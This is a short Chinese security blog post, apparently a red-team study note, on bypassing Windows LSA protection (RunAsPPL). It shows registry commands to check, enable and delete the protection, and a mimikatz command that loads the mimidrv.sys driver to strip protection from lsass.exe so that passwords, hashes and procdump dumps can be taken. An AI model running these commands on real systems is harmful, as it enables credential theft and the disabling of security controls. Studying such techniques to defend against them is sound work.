绕过LSA保护

admin
admin
admin
81887
文章
71
评论
2021年12月17日10:36:22评论240 views字数 1004阅读3分20秒阅读模式
绕过LSA保护
一位苦于信息安全的萌新小白帽
本实验仅用于信息防御教学,切勿用于它用途
公众号:XG小刚

继续补补笔记
LSA保护
微软在 Windows 8.1、Windows Server 2012 R2添加了 LSA 保护策略
https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn408187(v=ws.11)
以防止不受保护的进程对 lsass.exe 读取内存和代码注入。
这样一搞我们就不是用 mimikatz 对 lsass.exe 进行注入,获取密码等操作也会失败。

开启LAS保护
微软官方说了,进行以下操作就可以启用LSA保护
绕过LSA保护
我们先看看主机有没有开启LSA进程保护
reg query HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA
绕过LSA保护
添加RunAsPPL键值为1重启后就开启了LSA保护
reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA /v RunAsPPL /t REG_DWORD /d 1 /f
绕过LSA保护

这时即使我们获取了debug权限,也不能获取明文密码和hash了
此时使用mimikatz,进行注入lsass进程是失败的
绕过LSA保护
尝试经常用的procdump把lsass进程给弄下来
绕过LSA保护
发现不行了?这可咋整

接下来该咋办?

第一种方式就是将上面提到的注册表RunAsPPL键值对给删了
reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA /v RunAsPPL /f
但是想让配置生效需要重启主机,现实情景下你咋重启,这不暴露了吗?

还一种方式那就是mimikatz ,早早mimikatz就已经支持了LSA保护绕过
它自带一个mimidrv.sys文件,这文件具体干嘛的我也不知道,第一次用
绕过LSA保护
登上mimikatz,获取debug权限
mimidrv.sys驱动加载进去,使用该驱动绕过lsa保护
privilege::debug!+!processprotect /process:lsass.exe /remove
绕过LSA保护
这时再尝试发现绕过了lsa保护,可以正常注入ssp和读取密码了
再尝试procdump转储lsass进程
绕过LSA保护
成功

本文始发于微信公众号(XG小刚):绕过LSA保护

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月17日10:36:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  绕过LSA保护 http://cn-sec.com/archives/468243.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: